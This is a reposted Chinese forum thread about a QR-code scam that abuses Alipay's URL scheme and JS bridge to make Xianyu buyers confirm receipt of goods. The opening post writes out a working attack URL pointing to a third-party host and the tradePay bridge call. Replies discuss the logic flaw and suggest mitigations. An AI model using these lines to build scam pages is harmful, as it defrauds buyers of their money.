站点图标 谷姐靓号网

据说支付宝又被美国黑客打了-wachyi

Rate this post

给你个二维码,扫描后看上去是支付运费,其实是咸鱼交易确认收货

1. 先用支付宝 schema 打开第三方的网址:alipays://platformapi/startapp?appId=20000067&url=http://kgnb763n.blogqt.gq/index.php

2. 在 http://kgnb763n.blogqt.gq/index.php 的网页里面通过伪装的 0 元确认按钮事件触发: AlipayJSBridge.call("tradePay", { tradeNO: "2023042622001174211404250439" }, function(result) {});

其中 tradeNO 对应的就是闲鱼的订单号,所以就会出现扫个码就把订单给确认了的情况。

https://www.v2ex.com/t/937597

热议
推荐楼 worryfree 昨天20:15

人傻就应该多交点学费

3.你的好老哥发来一个二维码,告知需要扫码获得免费的价保,或者是告诉你扫码支付运费新人可能是零元

2楼 CJ大牛赚美元 昨天17:23

美国黑客:是梗吗????????????

3楼 jiangfei 昨天17:25

中国黑客:呵呵

4楼 Corei7 昨天17:26

文不对题

海鲜市场的老骗局了

5楼 sharp097 昨天17:26

在风向旗的群里看到推送了~

6楼 sharp097 昨天17:28

引用一下:
支付宝流程设计存在安全缺陷,会导致跨域攻击,咸鱼/淘宝交易慎扫不明二维码

目前支付宝存在逻辑漏洞,一个精心构造的虚假页面可以直接拉起确认收货提示框,如果此时确认收货会钱货两空。
虽然确认收货需要二次验证(密码、指纹、面容),但如果使用了 Face ID,这个二次验证基本等于自动确认。Mozzie(蚊子)大佬录制了一段视频来展示复现过程,可以看到在开启 Face ID 的情况下会直接完成确认收货操作。
目前支付宝似乎已对大额交易进行风控(确认收货后仍然冻结 3 天资金),但是小额交易仍需谨慎。
这个问题在一周前就已在知乎(相关文章)和小红书等平台被数人提起,但至今除了风控之外没有进一步动作。(Soha 的日常频道)

淘宝系 App 本身并不提供担保服务,担保交易功能由支付宝提供。这个接口是公开的 isbridge 接口,不管是阿里系还是第三方都在调用这个接口。接口设计之初并没有考虑到根据调用域名来鉴权,所以并不容易改动。

PS :看起来调用这个接口时支付宝并没有做二次确认,直接触发了确认流程( FaceID ) ,连付款都是假的。这个页面全套流程都是假的,但用户看到的流程和「支付 1 元」的流程别无二致,大概也是这么多人上当的原因。反而不是代码上的漏洞,而是逻辑上的漏洞。最简单的修复方式大概是在支付宝 SOK 里对「确认收货」行为做二次弹窗确认了。

在官方修复前(距问题发现已一周多),目前能想到的缓解措施如下:

· 避免扫难以确认安全性的二维码,尤其是在网购交易过程中
· 关闭人脸支付,避免扫到问题二维码后,无交互式的直接确认了
· 关闭小额免密支付

—— V2EX

7楼 jacob 昨天20:12

之前快手看到了

9楼 usbcdrom 昨天22:53

文不对题

海鲜市场的老骗局了

抖音B站都有测试视频了,一个买相机的被骗了5800

10楼 奧巴马 昨天22:55

usbcdrom 发表于 2023-5-6 22:53
抖音B站都有测试视频了,一个买相机的被骗了5800

这个方式的骗局好老了。一直都存在的!

12楼 HOH 6小时前

这骗术都包浆了,一眼丁真鉴定为年经帖

13楼 ekucn 2小时前

这种没物流的确认收货,卖家收到款会在支付宝冻结7天才能提现。
买家觉得不对打电话给客服,核实后钱就回来了。

算漏洞,但真被骗可能性不高

14楼 DogeLee2 2小时前

这玩的有点6

申明:本文内容由网友收集分享,仅供学习参考使用。如文中内容侵犯到您的利益,请在文章下方留言,本站会第一时间进行处理。

退出移动版